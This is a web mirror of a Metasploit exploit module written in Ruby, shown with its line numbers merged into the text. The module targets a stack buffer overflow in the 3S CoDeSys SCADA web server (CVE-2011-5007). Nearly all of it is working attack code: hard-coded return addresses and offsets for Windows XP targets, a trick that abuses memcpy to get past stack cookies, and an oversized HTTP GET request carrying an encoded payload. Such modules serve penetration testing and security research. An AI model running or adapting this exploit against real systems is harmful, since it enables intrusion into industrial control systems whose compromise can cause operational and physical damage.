CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/scada/codesys_web_server.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',13'Description' => %q{14This module exploits a remote stack buffer overflow vulnerability in153S-Smart Software Solutions product CoDeSys Scada Web Server Version161.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and17earlier.18},19'License' => MSF_LICENSE,20'Author' =>21[22'Luigi Auriemma', # Original discovery and poc23'Celil UNUVER',24'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit25'sinn3r',26'Michael Coppola'27],28'References' =>29[30[ 'CVE', '2011-5007'],31[ 'OSVDB', '77387'],32[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],33[ 'EDB', '18187' ],34[ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],35# The following clearifies why two people are credited for the discovery36[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']37],38'DefaultOptions' =>39{40'EXITFUNC' => 'process',41'DisablePayloadHandler' => false42},43'Platform' => 'win',44'Payload' =>45{46'size' => 650,47'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",48},4950'Targets' =>51[52[53'CoDeSys v2.3 on Windows XP SP3',54{55'Ret' => 0x7E4456F7, # jmp esp user3256'Offset' => 77557}58],59[60'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',61{62# Abuse a memcpy() call to circumvent stack cookies63'Offset' => 525,64'Ret' => 0x02CDFD68,65'Src' => 0x02CDFD58,66'Dest' => 0x02CDFA1467}68],69],70'Privileged' => false,71'DisclosureDate' => '2011-12-02'72))7374register_options([Opt::RPORT(8080)])75end7677def check78connect79sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")80res = sock.get_once81disconnect8283# Can't flag the web server as vulnerable, because it doesn't84# give us a version85vprint_line(res.to_s)86if res.to_s =~ /3S_WebServer/87return Exploit::CheckCode::Detected88else89return Exploit::CheckCode::Safe90end91end9293def exploit94connect9596if target.name =~ /v2\.3/97buffer = rand_text(target['Offset'])98buffer << [target.ret].pack('V')99buffer << make_nops(8)100buffer << payload.encoded101102else103# CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3104buffer = rand_text_alphanumeric(target['Offset'])105buffer << [target.ret].pack('V')106buffer << [target['Src']].pack('V')107buffer << [target['Dest']].pack('V')108buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison109buffer << make_nops(8)110buffer << payload.encoded111buffer << "\\a"112end113114sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"115116print_status("Trying target #{target.name}...")117sock.put(sploit)118res = sock.get_once(-1, 5)119print_line(res) unless res.nil?120121handler122disconnect123end124end125126=begin127target.ret verified on:128- Win XP SP3 unpatched129- Win XP SP3 fully-patched130- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed131=end132133134